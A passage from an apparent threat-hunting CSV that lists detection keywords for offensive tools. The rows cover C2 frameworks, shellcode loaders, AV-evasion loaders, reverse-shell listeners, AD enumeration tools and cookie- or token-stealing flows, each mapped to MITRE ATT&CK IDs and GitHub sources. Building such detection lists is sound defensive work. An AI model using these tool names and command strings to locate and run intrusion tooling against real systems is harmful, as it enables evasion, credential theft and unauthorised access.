- T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*runasppl_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*RunAsWinTcb.exe*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*RunAsWinTcb-master*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*RunCleanup-77740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*RunCodeExec-75740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*run-dll SharpSploit*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*rundll32 charlotte.dll*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*rundll32*.dll*a*/p:*","greyware_tool_keyword","rundll32","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account.","T1055.002 - T1078.002 - T1134.001 - T1134.002","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*rundll32*.dll*StartW*","greyware_tool_keyword","rundll32","Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.","T1218.005 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence","1","0","greyware tool - risks of False positive !","N/A","10","1224","189","2022-07-14T07:15:10Z","2021-01-01T16:44:42Z" +"*rundll32.exe agressor.dll*dec*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" +"*RunDLL32JSStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*Run-EXEonRemote*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*RunExfil-78740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*runFakeTerminal*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*Running final exploit packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*running SharpHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*RunOF.exe -*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*RunOF.Internals*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*RunRansomware-76740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*runShellcode*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" +"*runshellcode.asm*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*runshellcode.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*runshellcode.o*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*RunStealCookie-8B5C57DA-F404-ED11-82E4-0022481BF843.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*RunStealPowerAutomateToken-8C5C57DA-F404-ED11-82E4-0022481BF843.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*RuralBishop.csproj*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" +"*RuralBishop.exe*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" +"*RuralBishop.sln*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" +"*RuralBishop-master*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" +"*rustbof.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"*rustcat-3.0.0.zip*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rusthound * --zip --ldaps --adcs --old-bloodhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*rusthound *--domain*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*rusthound *--ldapfqdn *","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*rusthound *-ldaps *","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*rusthound -d *","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*rusthound* --adcs --dc-only*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*RustHound-main*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*rvazarkar/GMSAPasswordReader*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" +"*Rvn0xsy/Cooolis-ms*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*rvrsh3ll/BOF_Collection*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*rvrsh3ll/TokenTactics*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*RwBlAHQALQBDAG8AbQBwAHUAdABlAHIASQBuAGYAbwAgAHwAIABzAGUAbABlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAVwBpAG4AZABvAHcAcwBQAHIAbwBkAHUAYwB0AE4AYQBtAGUA*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEkAUABBAGQAZAByAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAoACQAXwAgAC0AbABpAGsAZQAgACIAMQAwAC4AKgAuACoALgAqACIAKQAgAC0AbwByACAAKAAkAF8AIAAtAGwAaQBrAGUAIAAiADEAOQAyAC4AMQA2ADgALgAqAC4AKgAiACkAIAAtAG8AcgAgACgAJABfACAALQBsAGkAawBlACAAIgAxADcAMgAuADEANgA4AC4AKgAuACoAIgApAH0A*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*rwxfinder.*","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","89","12","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" +"*RWXfinder-main*","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","89","12","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" +"*RXh0ZXJuYWwgQzIgUG9ydA==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*rxwx/cs-rdll-ipc-example*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 